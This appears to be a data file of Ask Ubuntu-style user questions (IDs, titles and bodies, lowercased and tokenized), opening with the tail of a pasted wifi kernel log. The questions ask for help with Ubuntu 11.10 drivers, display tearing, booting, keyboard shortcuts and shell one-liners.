mbi , 2700 mbm ) [ 10959.619502 ] cfg80211 : updating information on frequency 2457 mhz for a 20 mhz width channel with regulatory rule : [ 10959.619510 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 10959.619518 ] cfg80211 : updating information on frequency 2462 mhz for a 20 mhz width channel with regulatory rule : [ 10959.619528 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 10959.619536 ] cfg80211 : disabling freq 2467 mhz [ 10959.619541 ] cfg80211 : disabling freq 2472 mhz [ 10959.619547 ] cfg80211 : disabling freq 2484 mhz [ 10959.619557 ] cfg80211 : world regulatory domain updated : [ 10959.619563 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 10959.619572 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 10959.619582 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 10959.619591 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 10959.619600 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 10959.619609 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 10960.289297 ] wlan0 : authenticate with 00:24 : d4:6c : a7:60 ( try 1 ) [ 10960.290935 ] wlan0 : authenticated [ 10960.291233 ] wlan0 : associate with 00:24 : d4:6c : a7:60 ( try 1 ) [ 10960.294306 ] wlan0 : rx reassocresp from 00:24 : d4:6c : a7:60 ( capab=0x411 status=0 aid=1 ) [ 10960.294317 ] wlan0 : associated [ 10960.294932 ] ieee80211 phy0 : wl_ops_bss_info_changed : qos enabled : true ( implement ) [ 10960.294953 ] ieee80211 phy0 : brcmsmac : wl_ops_bss_info_changed : associated [ 10960.294974 ] ieee80211 phy0 : wl_ops_bss_info_changed : arp filtering : enabled true , count 0 ( implement ) [ 10960.352994 ] ieee80211 phy0 : wl_ops_bss_info_changed : arp filtering : enabled true , count 1 ( implement ) [ 10970.495396 ] wlan0 : no ipv6 routers present [ 11087.098762 ] thunderbird-bin [ 21454 ] : segfault at 47a2f968 ip 00007f8d4e101c08 sp 00007fff100b9600 error 4 in libx11.so.6.3.0 [ 7f8d4e0cc000+133000 ] [ 11121.347726 ] ieee80211 phy0 : wl_ops_bss_info_changed : qos enabled : false ( implement ) [ 11121.347751 ] ieee80211 phy0 : brcmsmac : wl_ops_bss_info_changed : disassociated [ 11121.347764 ] ieee80211 phy0 : wl_ops_bss_info_changed : arp filtering : enabled false , count 1 ( implement ) [ 11121.347772 ] wlan0 : deauthenticating from 00:24 : d4:6c : a7:60 by local choice ( reason=3 ) [ 11121.458090 ] cfg80211 : all devices are disconnected , going to restore regulatory settings [ 11121.458106 ] cfg80211 : restoring regulatory settings [ 11121.458159 ] cfg80211 : calling crda to update world regulatory domain [ 11121.466926 ] cfg80211 : updating information on frequency 2412 mhz for a 20 mhz width channel with regulatory rule : [ 11121.466931 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 11121.466934 ] cfg80211 : updating information on frequency 2417 mhz for a 20 mhz width channel with regulatory rule : [ 11121.466937 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 11121.466939 ] cfg80211 : updating information on frequency 2422 mhz for a 20 mhz width channel with regulatory rule : [ 11121.466942 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 11121.466945 ] cfg80211 : updating information on frequency 2427 mhz for a 20 mhz width channel with regulatory rule : [ 11121.466947 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 11121.466950 ] cfg80211 : updating information on frequency 2432 mhz for a 20 mhz width channel with regulatory rule : [ 11121.466953 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 11121.466955 ] cfg80211 : updating information on frequency 2437 mhz for a 20 mhz width channel with regulatory rule : [ 11121.466958 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 11121.466960 ] cfg80211 : updating information on frequency 2442 mhz for a 20 mhz width channel with regulatory rule : [ 11121.466963 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 11121.466966 ] cfg80211 : updating information on frequency 2447 mhz for a 20 mhz width channel with regulatory rule : [ 11121.466969 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 11121.466971 ] cfg80211 : updating information on frequency 2452 mhz for a 20 mhz width channel with regulatory rule : [ 11121.466974 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 11121.466976 ] cfg80211 : updating information on frequency 2457 mhz for a 20 mhz width channel with regulatory rule : [ 11121.466979 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 11121.466982 ] cfg80211 : updating information on frequency 2462 mhz for a 20 mhz width channel with regulatory rule : [ 11121.466985 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 11121.466987 ] cfg80211 : disabling freq 2467 mhz [ 11121.466989 ] cfg80211 : disabling freq 2472 mhz [ 11121.466990 ] cfg80211 : disabling freq 2484 mhz [ 11121.466993 ] cfg80211 : world regulatory domain updated : [ 11121.466994 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 11121.466997 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 11121.467000 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 11121.467003 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 11121.467005 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 11121.467008 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 11122.126757 ] wlan0 : authenticate with 00:24 : d4:6c : a7:60 ( try 1 ) [ 11122.128357 ] wlan0 : authenticated [ 11122.128949 ] wlan0 : associate with 00:24 : d4:6c : a7:60 ( try 1 ) [ 11122.132048 ] wlan0 : rx reassocresp from 00:24 : d4:6c : a7:60 ( capab=0x411 status=0 aid=1 ) [ 11122.132061 ] wlan0 : associated [ 11122.132665 ] ieee80211 phy0 : wl_ops_bss_info_changed : qos enabled : true ( implement ) [ 11122.132692 ] ieee80211 phy0 : brcmsmac : wl_ops_bss_info_changed : associated [ 11122.132717 ] ieee80211 phy0 : wl_ops_bss_info_changed : arp filtering : enabled true , count 0 ( implement ) [ 11122.209770 ] ieee80211 phy0 : wl_ops_bss_info_changed : arp filtering : enabled true , count 1 ( implement ) [ 11133.139251 ] wlan0 : no ipv6 routers present [ 12443.067973 ] thunderbird-bin [ 21693 ] : segfault at 4432f968 ip 00007fed4a977c08 sp 00007fffd1700aa0 error 4 in libx11.so.6.3.0 [ 7fed4a942000+133000 ] [ 12860.796445 ] ieee80211 phy0 : wl_ops_bss_info_changed : qos enabled : false ( implement ) [ 12860.796495 ] ieee80211 phy0 : brcmsmac : wl_ops_bss_info_changed : disassociated [ 12860.796510 ] ieee80211 phy0 : wl_ops_bss_info_changed : arp filtering : enabled false , count 1 ( implement ) [ 12860.796522 ] wlan0 : deauthenticating from 00:24 : d4:6c : a7:60 by local choice ( reason=3 ) [ 12860.928592 ] cfg80211 : all devices are disconnected , going to restore regulatory settings [ 12860.928608 ] cfg80211 : restoring regulatory settings [ 12860.928619 ] cfg80211 : calling crda to update world regulatory domain [ 12860.938395 ] cfg80211 : updating information on frequency 2412 mhz for a 20 mhz width channel with regulatory rule : [ 12860.938410 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 12860.938419 ] cfg80211 : updating information on frequency 2417 mhz for a 20 mhz width channel with regulatory rule : [ 12860.938428 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 12860.938436 ] cfg80211 : updating information on frequency 2422 mhz for a 20 mhz width channel with regulatory rule : [ 12860.938445 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 12860.938454 ] cfg80211 : updating information on frequency 2427 mhz for a 20 mhz width channel with regulatory rule : [ 12860.938464 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 12860.938472 ] cfg80211 : updating information on frequency 2432 mhz for a 20 mhz width channel with regulatory rule : [ 12860.938482 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 12860.938490 ] cfg80211 : updating information on frequency 2437 mhz for a 20 mhz width channel with regulatory rule : [ 12860.938500 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 12860.938507 ] cfg80211 : updating information on frequency 2442 mhz for a 20 mhz width channel with regulatory rule : [ 12860.938516 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 12860.938522 ] cfg80211 : updating information on frequency 2447 mhz for a 20 mhz width channel with regulatory rule : [ 12860.938532 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 12860.938538 ] cfg80211 : updating information on frequency 2452 mhz for a 20 mhz width channel with regulatory rule : [ 12860.938548 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 12860.938557 ] cfg80211 : updating information on frequency 2457 mhz for a 20 mhz width channel with regulatory rule : [ 12860.938565 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 12860.938572 ] cfg80211 : updating information on frequency 2462 mhz for a 20 mhz width channel with regulatory rule : [ 12860.938580 ] cfg80211 : 2402000 khz - 2472000 khz @ khz ) , ( 300 mbi , 2700 mbm ) [ 12860.938586 ] cfg80211 : disabling freq 2467 mhz [ 12860.938591 ] cfg80211 : disabling freq 2472 mhz [ 12860.938596 ] cfg80211 : disabling freq 2484 mhz [ 12860.938605 ] cfg80211 : world regulatory domain updated : [ 12860.938610 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 12860.938618 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 12860.938627 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 12860.938636 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 12860.938645 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 12860.938653 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 12861.604995 ] wlan0 : authenticate with 00:24 : d4:6c : a7:60 ( try 1 ) [ 12861.606814 ] wlan0 : authenticated [ 12861.607309 ] wlan0 : associate with 00:24 : d4:6c : a7:60 ( try 1 ) [ 12861.610404 ] wlan0 : rx reassocresp from 00:24 : d4:6c : a7:60 ( capab=0x411 status=0 aid=1 ) [ 12861.610415 ] wlan0 : associated [ 12861.611046 ] ieee80211 phy0 : wl_ops_bss_info_changed : qos enabled : true ( implement ) [ 12861.611067 ] ieee80211 phy0 : brcmsmac : wl_ops_bss_info_changed : associated [ 12861.611089 ] ieee80211 phy0 : wl_ops_bss_info_changed : arp filtering : enabled true , count 0 ( implement ) [ 12861.687610 ] ieee80211 phy0 : wl_ops_bss_info_changed : arp filtering : enabled true , count 1 ( implement ) [ 12872.562747 ] wlan0 : no ipv6 routers present [ 12955.317191 ] psmouse.c : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 12955.318831 ] psmouse.c : touchpad at isa0060/serio1/input0 lost sync at byte 1 [ 12955.330146 ] psmouse.c : touchpad at isa0060/serio1/input0 - driver resynched . edit : trying broadcom bcm4313 working , but terribly slow $ lsmod | grep brc brcmsmac 631693 0 brcmutil 17837 1 brcmsmac mac80211 310872 1 brcmsmac cfg80211 199587 2 brcmsmac , mac80211 crc_ccitt 12667 1 brcmsmac
73903	compose key in lxde ?	i recently installed lxde in ubuntu 11.10 , so that i can choose it at the login screen , but i 've since noticed that there 's no compose key ( since i enabled it in gnome shell and unity ) so i was wondering how to enable a compose key ? thanks for any help : )
73904	how do i monitor power consumption ?	the powertop program shows the power usage , but only after about five minutes . before that , it shows : no acpi power usage estimate available that 's one of the limitations of the powertop program . what program is recommended for reliably monitoring the power usage ? is it possible to get a power usage history similar to the memory usage history in the system monitor as well ?
73905	what are the differences between lubuntu and lxde sessions ?	lubuntu login manager lets you choose between a lubuntu session and a lxde session . apart from the wallpaper ( : p ) what are the differences between them ? i 've also noticed that the average cpu temperature on my laptop is lower when i 'm on a lxde session .
73909	screen tearing in 11.10 with intel graphics	i have a slight screen tearing when watching videos in ubuntu 11.10 x64 , really annoying . both in unity and gnome-shell . please focus the answer to gs since it 's my primary de and it 's where i want it to work . this is what i use : opengl vendor string : tungsten graphics , inc opengl renderer string : mesa dri intel ( r ) sandybridge mobile opengl version string : 2.1 mesa 7.11 opengl shading language version string : 1.20 opengl extensions : i guess it 's because i ca n't get the screen to sync vertically but i do n't know how to fix it . i found a thread talking about driconf and i 've set the settings there to `` always sync vertically '' . what can i do more to get this fixed ? please help , any answer is welcome : ) it would suck if i ca n't watch videos comfortably on my new laptop . update : i thought it might have something to do with the screen refresh rate so i tried to change that manually . i found an online documentation for my laptop ( dell latitude e5420 ) : http : //support.dell.com/support/edocs/systems/late5520/en/sm_en/guid-89cf3778-9361-4f01-a0a4-1d257ae39cad.html there i found that the screen refresh rate was 60 hz but i do n't know how to change that manually in gnome-shell , so i tried changing the compiz settings in unity to see if there was any difference . i still had the issue but i think it was not as severe , it 's hard to tell . update 2 : the problem exists also in unity 2d and gnome-classic . so this problem is perhaps restricted to a display setting or driver problem ? update 3 : the solution for gnome-shell is in the comments to the accepted answer .
73911	radeon 9200 open source drivers	i have installed on my friend old computer ubuntu 11.10 but it 's slower then windows xp . probably because of drivers for graphic card - radeon 9200 . can i install open source drivers for it ?
73913	screen goes black/blank after trying to run xubuntu ?	i just used wubi to install xubuntu to my computer . the install seemed successful . i rebooted my computer , and i selected xubuntu from the options ( the two options were xubuntu and windows 7 , my default os ) . however , xubuntu just sort of flashes some text across the screen then lets me choose from a few `` boot modes '' , i choose the normal mode , and then i 'm taken to a blank screen ( black background , flashing white cursor , ca n't type anything in , nothing happens ) . and within around a minute of the blank screen , its like my laptop monitor completely shuts down ( everything goes black , and the monitor is n't displaying black , but its completely off ) . how can i fix this ? by the way , i 'm using an hp pavilion g7 laptop . i 'm not entirely sure , but i believe this is the one i purchased . it comes with windows 7 by default and i 'm trying to use wubi to install the latest version of xubuntu .
73918	mouse clicks freeze after few seconds or change windows	i am having some weird problems , i use a laptop with multitouch pad but when i connect my mouse the darn thing just freezes . not the ordinary freeze ... only clicks ( left and right ) but i can move freely and the system is responsive to my hover or focus . for example right now i just connected my mouse and maximized firefox page , the mouse works perfectly and does n't freeze inside firefox but he is confined to this window and can not leave the window ... or at least ca n't click in other windows . i am having the latest operating system an updated to the day with unity 2d
73922	grub_cmdline_linux_default= '' text '' is not working	i am trying to make ubuntu run in text mode only as i want to use it as local server . i searched and found that i should edit /etc/default/grub and replace quiet splash with text then run update-grub , but nothing happens . any suggestions ?
73923	did not align when using gparted - will i be fine ?	i run a dual-boot ( windows xp on ntfs + ubuntu 10.04 on ext3 ) on a crappy 6 year old laptop . today i wanted to shread 8gb or so off the right end of my xp partition and give it to ubuntu . i ended up getting an `` unable to satisfy all constraints '' error when trying to enlarge the extended partition ubuntu was sitting on , which i suppose was because it had problems `` rounding '' to the nearest mib . a google search into some forum post ( which i ca n't find anymore ) said you could just tell it to do no alignment ( the choices were mib , cylinder , or none ) . i did this and everything seemed to work fine . i just rebooted and it hung after selecting ubuntu from the grub loader . however , when i restarted it again ( mostly absent-mindedly ) it suddenly worked ( this itself is weird - i was expecting having to manually change grub , as gparted itself suggested during the partitioning ) , though some things seemed sluggish for a few minutes ( i ca n't tell anymore ) . feeling paranoid about the weird hanging , auto-solution , and sluggishness , i did some more googling . i turns out that the gparted document says : `` use none only if you have an in-depth knowledge of disk structure , partition tables , and boot records . this setting places partition boundaries relative to the end of any immediately preceding partition on the disk device . this setting is not guaranteed to reserve or respect space required for boot records . '' further reading/googling seems to say that i also may be missing out on extra performance on ssds or compatibility with old oss , though neither of these apply to me . so , questions : '' considering i do not have the `` in-depth knowledge '' suggested by the gparted docs , will i be fine ? should i expect weird problems to crop up in the future ? if so , what is the fastest way for me to realign ( i 'm guessing gparted , but maybe someone else knows a few tricks ) ? '' thank you , -yan
73925	strange text-mode behavior ( large fonts and blue lines ) with virtualbox	i 've just installed ubuntu 11.10 on oracle virtualbox and everything went fine except going to text-mode using ctrl + alt + f1 , the console appears in strange behavior as seen on the following link http : //img443.imageshack.us/img443/1073/textmodeinx.png i appreciate your help : )
73926	is it possible to use auto-login in lightdm even with encrypted home ?	configuring the auto-login in lightdm is possible as answered here . i tried but , still i 'm not able to auto-login . it seems as i have n't configured auto-login . is this because my home folder is encrypted ? so it does not have the passphrase an ca n't decrypt my home folder .
73931	about ubuntu one and re-check	i have a question , is there a way to tell ubuntu one to compare and re-check the server and pc synced files and folders to detect any diference between them ? thanks for answering.-
73932	fixed width and height for new opened folder/file	i do n't like to open file and then adjust height and width , which always quite the same for every file and folder . do you know if i could make fixed height and width for new opened folder or file ? of course then i could resize it if i wanted to . thank you very much .
73938	simple and convenient programs for blogging	i want to write a blog just for myself . is there any simple and convenient programs to do that ? : )
73940	installed ubuntu 11.10 and the system cant boot	i installed ubuntu on an old ibm thinkpad r40 after trying it out by booting it from a usb drive . everything worked perfectly , i had no issues whatsoever , so i used the icon on the desktop to install it . during the install i got a cd drive error , but because i 'm using a usb i didnt give it much thought . the isntall completes , and it asks me to reboot . after i reboot , i get my bios splash , and then a black screen with the blinking underscore like the one you see on a command prompt . that 's as far as it ever gets . no errors , no error tones , no apparent failure of any kind , it just stops . it was left to sit for sever hours with no results . since then i 've tried installs on multiple different hard drives . i have formatted with ext4 and then tried installing . nothing works . this is the most bizarre issue i 've had to deal with in years . i have no idea how to fix this , any help or insight would be greatly appreciated . [ update ] after further reading i see that often people are told to hold down shift to get into the grub menu . holding down shift for any length of time has proven completely inefective . if i hold it down during reboot , i get a `` stuck key '' error , if i hold it down after bios splash , nothing happens . nor does shift-e
73944	tools to flash the firmware from terminal/gui	what tools can i find in ubuntu to flash the firmware of the motherboard or any other hardware from terminal or gui . specially for those formats that ask for a 3.5 disk ( in this time of age ? ? ) or other formats made that are troublesome to do .
73947	how to confirm sun java 6 's license agreement automatically ?	when i install this : sudo apt-get install -y sun-java6-bin sun-java6-jdk sun-java6-jre sun-java6-plugin i am still forced to select ok and yes during the install . the -y switch does n't work for this . is there a way to do this automatically ?
73951	how do i modify the ctime of a file ?	i 'm attempting to modify the ctime of a file in ubuntu 11.04 . i have tried : debugfs -w -r 'set_inode_field < 123456 > ctime 201131100000 ' /dev/mapper/myserver-root where < 123456 > is the inode serial number of my file ( entering the full path does n't work for some reason ) . the command does n't produce any output ( i assume it worked ? ) . i then flushed the inode cache : echo 3 > /proc/sys/vm/drop_caches but still , no changes ... any ideas where i 'm going wrong ?
73954	ctrl+a does not work in all programs	i use ubuntu 11.10 . and i have a big problem . in some programs ctrl+a does n't work . for example in chrome ctrl+a does n't work ; only in text areas . in gedit ctrl+a does n't work at all . in qutim ctrl+a works well .
73960	clutter refuses to start , reporting glx problems	so , it seems like i 'm not the only one with this problem : julian @ yggdrasil : ~ $ gnome-shell -- replace ( gnome-shell:11309 ) : clutter-critical ** : unable to initialize clutter : unable to select the newly created glx context window manager error : unable to initialize clutter . if i try to log in normally , gnome fallbacks to fallback mode a bit of googling showed that this is ultimately reduced to a lacking feature in my gpu ( nvidia geforce 9500 gt ) , although this seems kind of weird , considering that i 've been able to run unity ( apparently , users with the same problem also reported having trouble running compiz ) . i 'm running the nvidia driver version 285.08.09 , which seems to be the latest available . this computer has got 2 gb of memory , and uses a intel dual core cpu with 1.6 ghz in each core .
73962	keyboard shortcut ( accels ) forgotten after reboot ?	following on from my question here : keyboard shortcut for `` open a terminal here '' i have found that my accels are forgotten after a reboot and have to be assigned again . why is this , and how can i make them 'stick ' permanently ?
73968	wacom pointer issues when using the unity launcher	i have ubuntu 11.10 on my motion le 1600 tablet pc . every so often when i click on application or the unity bar the pointer will move erratically and open other applications , one example is when i click the workspace switcher in the unity bar , it will begin to open the desktops , but then suddenly stop and open up 3 trash windows . i have a feeling its a compiz problem because this does n't happen in unity 2d mode . i do n't want to use unity 2d because it runs slower than the normal unity mode .
73970	what version of ubuntu 11.10 should i prefer ? 64bit or 32bit ?	my notebook configuration : model : dell n4110 processor : 2nd generation intelâž coreâ˘ i3-2310m processor 2.10 ghz ram : 4gb as far as i know , some software do not support 64 bit os . what about this ?
73977	how do i use the same drive partition for both windows 7 and ubuntu 11.10 documents folders ?	i 'm running a dual boot of both ubuntu 11.10 and windows 7 . i have two hard drives , and three partitions : windows 7 on a dedicated ssd , ubuntu on the second hard drive , first partition , and then a `` data '' partition on that same drive . i have already moved all my linked `` libraries '' from windows to the `` data '' partition . note : the data partition is a ntfs partition . i really do n't want to change it , but can if necessary what i 'm wanting is to have access to my common files under the same folder . for example , i want my `` my documents '' ( windows 7 ) folder to correspond to my `` documents '' ( ubuntu ) folder ; my `` my music '' ( windows 7 ) folder to correspond to `` music '' ( ubuntu ) folder ; etc , . is there any way to easily do this ?
73979	how do i get ubuntu to open folders with nautilus by default ?	after upgrading to ubuntu 11.10 , i once right-clicked on a folder and told it to open the folder with movie player ( `` open with other application ... '' ) . no harm done there , right ? nope , now ubuntu opens folders with movie player instead of nautilus . if i plug in a thumb drive , movie player opens . if i click on the trash icon ... movie player ! the default action for opening a folder has somehow become movie player . clicking on the `` home folder '' icon still opens nautilus and opening a folder in nautilus stays in nautilus , but other links to folders automatically open movie player . how can i change this back ?
73985	how to remove additional icons on firefox toolbar	i have a strange problem . i installed flash and video download add-on for my firefox browser and i see a bunch of icons in my navigation toolbar . i am not able to remove those bunch of icons by customize option . i disabled the add-on and finally uninstalled it completely , but still i have the bunch of icons placed in my navigation bar . i have a screenshot of it as below . any suggestions on how to get it removed is appreciated . i have ubuntu 11.10 and firefox 7.0.1
73986	promiscuous mode network traffic stat util ?	i want to get a stat of packets/bytes from/to each ip in the network . wireshark is too heavy for me , and tcpdump has no stat function . vnstat seems not aware of ip address at all . any choice ?
73993	how to completely remove desktop ?	i wanted to switch to xfce ( i had kde and gnome installed ) , and i did this : sudo apt-get install xubuntu-desktop sudo apt-get remove kubuntu-desktop sudo apt-get remove ubuntu-desktop sudo apt-get autoremove but to my surprise , i could still pick gnome , kde plasma , etc during the log in . so , how do i completely remove kde and gnome desktops ?
73995	put `` software center '' in dash home	i removed all the icons in the sidebar because i 'd like it to act more like a taskbar than a program dock . however , i now find it annoying that i must type `` software center '' into the dash search bar whenever i wish to open it . i thought it would be a good idea to put it right in the dash home somewhere . since i do n't use thunderbird , i thought to replace that icon with the software center . but as an ubuntu novice , i 've got no idea on how to go about doing this . additional info : my dash home currently reads : media apps-internet apps-more apps-find files browse the web-view photos-check email-listen to music i 'd like it to say : media apps-internet apps-more apps-find files browse the web-view photos-*software center*-listen to music any way to accomplish this ? thanks . ubuntu 11.10
73997	how do i fix a `` failed to download package files '' error ?	after i installed ubuntu , i can not update any software with the error message `` failed to download package files '' . after having googled , i have tried : sudo apt-get update sudo apt-get upgrade changed to another sources but i still got the same error message . and there is no problem with internet connection as i can connect to internet using firefox in ubuntu . any ideas ?
73998	problems linking to my wifi router td-w8951nd	i have ubuntu 11.04 and i want to update it . however , ubuntu does not link to my wireless router . it asks me for a password and says `` password wrong '' . i tried to remove the password from the router with free access , but nothing changed . the same pc with windows links perfectly without problems , same as my cell phone and my wife 's pc . the router is a tp-link td-w8951nd , the wireless pen is tenda w541u i also tried to update the drivers from the wifi-pen i tried to install madwifi any ideas that could help me ? thanks
74000	how to automatically detect my display ( monitor 's ) compatible settings ?	i changed my monitor recently and the settings the monitor expects is 1280x1024 @ 60 hz . every time i restart my ubuntu after a shutdown , the default setting that comes up for the monitor is 1280x1024 @ 50hz . as my new monitor is not compatible with this settings , it only displays the error message viz - `` the current input timining is not supported by the monitor display '' . the only way i can come out of this is , to connect an old monitor , change the settings to 1280x1024 @ 60hz and again reconnect the new one . can someone help me on how to make ubuntu automatically detect my new monitor 's compatible settings when it boots up ? i am using ubuntu 10.04 thanks karthik
74001	bash text processing and error message	for example i have this script that kills firefox ps x | grep firefox | grep -v grep | awk ' { print $ 1 } '| xargs kill -9 but when there is no firefox running it spits out : usage : kill pid ... send sigterm to every process listed . kill signal pid ... send a signal to every process listed . kill -s signal pid ... send a signal to every process listed . kill -l list all signal names . kill -l list all signal names in a nice table . kill -l signal convert between signal numbers and names . what is the easiest way to display error message ?
74008	toshiba satellite l745d - internal mic not working	i have a toshiba l745d ( amd a6-3400m ) . i can not get my internal mic to work . my sound card : conexant cx20585 i 've tried this : echo `` options snd-hda-intel model=thinkpad '' | sudo tee -a /etc/modprobe.d/alsa-base.conf echo `` options snd-hda-intel model=ideapad '' | sudo tee -a /etc/modprobe.d/alsa-base.conf echo `` options snd-hda-intel model=asus '' | sudo tee -a /etc/modprobe.d/alsa-base.conf ... but that did n't work either . apparently that works for different notebook models with the same sound card . i also tried muting the right mic channel ; that also worked for someone on a different model . here is my alsa information : http : //www.alsa-project.org/db/ ? f=6b57a7faecf5525ccb5212a6f60ee9d1bc792838 any solutions out there ?
74011	how to add an extension to all files via terminal	i would like to add the .zip extension to all files . i tried this , however it does not work : ls | awk ' { print $ 1 `` `` $ 1 '' .zip '' } ' | xargs mv -f
74019	initializing problem when using the catalyst control center with fglrx	i activated , or installed the catalyst 11.8 driver , which is the non postrelease one , i think . when i go into applications - > other - > catalyst control center , i get an error saying `` there was a problem initializing catalyst control center linux edition ... '' also , when i open up a terminal and use fglrxinfo i get a x error , it says badrequest ( invalid request code or no such operation ) . i 'm not using unity , i 'm using gnome classic . video card is a ati mobility raedeon hd 5470 .
74023	how do i set the vsync option with the radeon driver ?	ok am very new to linux so am finding quite a few stumbling blocks with it but most of the help i can find online . i have a sempron with an older ati gfx card that requires me to use the radeon driver and not the offical ati ones . the problem i am encountering is image tearing while watching video 's and i 've tried to look into the problem online and all i can come up with is websites saying put the option of vsync in the xorg.conf file . but as you well know , xorg.conf is not used any more ( as i understand ) . also i am suffering from the drivers/linux/whatever not picking up the correct edid data from the monitor so lack correct screen resolutions . cvt and xrandr are not picking up the correct res/pixel clocks as the screen garbles but i guess i can just get the correct pixel clocks via a windows box and powerstrip . i am mainly concerned with fixing the vsync problem as watching video is damned horrible , so any input you could give me with this would be greatly appreciated .
74027	is there such thing as a heat / power management ?	i was having a problem with my screen resolution constantly changing on the fly while x was running with dual monitors . actually i am still having this problem but i think i figured out what was the trigger . it seems to happen only when my laptop starts to heat up when doing some cpu intensive tasks . so i am wondering if there is such thing as a program that run in the background that tries to regulate heat or maybe the power management , that i could disable in order to get rid of the problem mentioned above . maybe the unity equivalent of the gnome settings manager.. thanks a lot for any help !
74029	how to use my public ip ?	i want to set up my pc with public ip settings . i tried to set it by adding it in 'edit connections ' as i do with the win pcs in my office . but http : //www.whatismyip.com/ reports the ip of my proxy . googling doesnt help much , as 11.10 results are hard to find .
74031	startup applications missing from system settings screen . where can i find it ?	i have read related questions here , but my problem in 11.10 is : i have no `` startup apps '' item in `` system setting '' at all . how can i get it back ?
74035	not able to sign in ubuntu one with `` org.freedesktop.secret.collection '' error	i have clean installation of u11.10 ( with updates ) . f i run ubuntu one client and try connect to my existent account , i get this error message : method `` createitem '' with signature `` a { sv } ( oayay ) b '' on interface `` org.freedesktop.secret.collection '' does n't exist about this are some bug reports since u11.04 , but i 'm wondering , that such a key feature do not work at all in final release of u11.10 . i can live without ubuntu one storage no more - so u11.10 is quite unusable for me ! what 's going on ? where is the update to correct such important issue ? please help
74037	can i somehow use win+1 ( 2 , 3 , 4 , 5.. ) to start applications in gnome shell 's left-hand launcher ?	like in unity . as simply as that . = ) otherwise the left-hand-launcher ( panel or whatever you would call it ) would be quite useless to me .
74038	how to integrate banshee into the system tray for gnome	i am using ubuntu 11.10 and i recently installed gnome 3 . i miss the banshee unity plugin for the system tray i was wondering how to incorporate that into the system tray for gnome . that is probably the only thing that i miss from unity . i would hate to go back to it just for that unity plug-in . or if there was a way to pick and choose what i liked about unity while still using gnome that would be good too . thanks in advance for any help .
74040	is it possible to somehow use the arrow-keys in gnome 3 to navigate through the opened windows ?	when pressing the super ( windows ) -key . i probably would need an extension for it , i suppose . its qute annoying atm as i always have to switch between using the keyboard with 2 hands and the touchpad + keyboard .
74041	how do i disable ctrl+alt+s to minimize a window ?	when i type ctrl+alt+s on a window , the body of the window rolls up . how can i disable this shortcut , that i want to use for another purpose in my emacs configuration ?
